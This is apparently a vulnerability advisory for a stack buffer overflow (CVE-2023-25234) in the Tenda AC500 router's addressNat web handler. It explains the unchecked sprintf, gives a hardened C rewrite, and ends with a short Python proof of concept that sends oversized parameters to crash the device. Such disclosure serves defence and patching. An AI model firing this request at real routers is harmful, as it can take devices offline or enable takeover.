
CVE-2023-25234: Vluninfo_Repo/CNVDs/113_1 at main · Funcy33/Vluninfo_Repo

Tenda AC500 V2.0.1.9(1307) is vulnerable to Buffer Overflow in function fromAddressNat via parameters entrys and mitInterface.

Tags: #vulnerability #rce #buffer_overflow

Tenda Router AC500 Vulnerability

This vulnerability lies in the /goform/addressNat page and affects the latest firmware version of the Tenda Router AC500. (The latest version is AC500_V2.0.1.9(1307).)

Vulnerability Description

There is a stack-based buffer overflow vulnerability in function fromAddressNat.

In function fromAddressNat, two user-provided parameters, entrys and mitInterface, are read into v8 and v7. These two variables are then passed to sprintf without any length check, which may overflow the stack-based buffer s.

So by requesting the page /goform/addressNat with carefully crafted overflow data, an attacker can easily cause a denial of service or achieve remote code execution.
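The pattern described above (user-controlled strings formatted with sprintf into a fixed stack buffer) and its hardened counterpart, as an added illustration that is not the vendor's code and not part of the original advisory. The buffer size, the per-parameter limit and the format string are assumptions; the advisory gives none of them. The unsafe form is shown only in a comment; the compiled function bounds each parameter, uses snprintf and treats truncation as an error rather than silently clipping.

```c
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

/* Hypothetical sizes: the advisory does not state the real size of s
 * or any intended parameter length. */
#define NAT_BUF_SIZE  128
#define MAX_PARAM_LEN 32

/* Illustrative sketch of the vulnerable pattern the advisory describes
 * (NOT the vendor's code):
 *
 *   char s[NAT_BUF_SIZE];
 *   sprintf(s, "%s %s", entrys, mitInterface);   // no length check
 *
 * Any request whose parameters together exceed the buffer writes past s
 * on the stack, which is the crash/overflow condition reported above.
 */

/* Hardened form: reject over-long parameters up front, format with a
 * bounded call, and refuse output that would have been truncated.
 * Returns true on success, false if the input was rejected. */
bool format_nat_rule(const char *entrys, const char *mitInterface,
                     char *out, size_t out_len)
{
    if (!entrys || !mitInterface || !out || out_len == 0)
        return false;

    /* strnlen with limit+1 distinguishes "fits" from "too long" without
     * scanning an unbounded attacker-controlled string. */
    if (strnlen(entrys, MAX_PARAM_LEN + 1) > MAX_PARAM_LEN)
        return false;
    if (strnlen(mitInterface, MAX_PARAM_LEN + 1) > MAX_PARAM_LEN)
        return false;

    int n = snprintf(out, out_len, "%s %s", entrys, mitInterface);
    if (n < 0 || (size_t)n >= out_len)
        return false;   /* output did not fit: error, not silent clipping */
    return true;
}

int main(void)
{
    char s[NAT_BUF_SIZE];
    char big[0x201];                       /* constructed oversized input */
    memset(big, 's', 0x200);
    big[0x200] = '\0';

    printf("normal request accepted:   %d\n",
           format_nat_rule("1", "eth0", s, sizeof s));
    printf("oversized request accepted: %d\n",
           format_nat_rule(big, "a", s, sizeof s));
    return 0;
}
```

The two checks are deliberately separate: the per-parameter limit is the input-validation layer a request handler should have, and the snprintf return check is the last line of defence if a caller ever passes a smaller buffer than expected.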

POC

import requests

# Target router address (adjust to the device under test).
IP = "10.10.10.1"

# Both parameters are passed to sprintf without a length check,
# so 0x200-byte values exceed the stack buffer s.
url = f"http://{IP}/goform/addressNat?"
url += "entrys=" + "s" * 0x200
url += "&mitInterface=" + "a" * 0x200

# A single unauthenticated GET triggers the overflow.
response = requests.get(url)

Timeline

Acknowledgment

Credit to @Funcy_kilar from Guangzhou University.
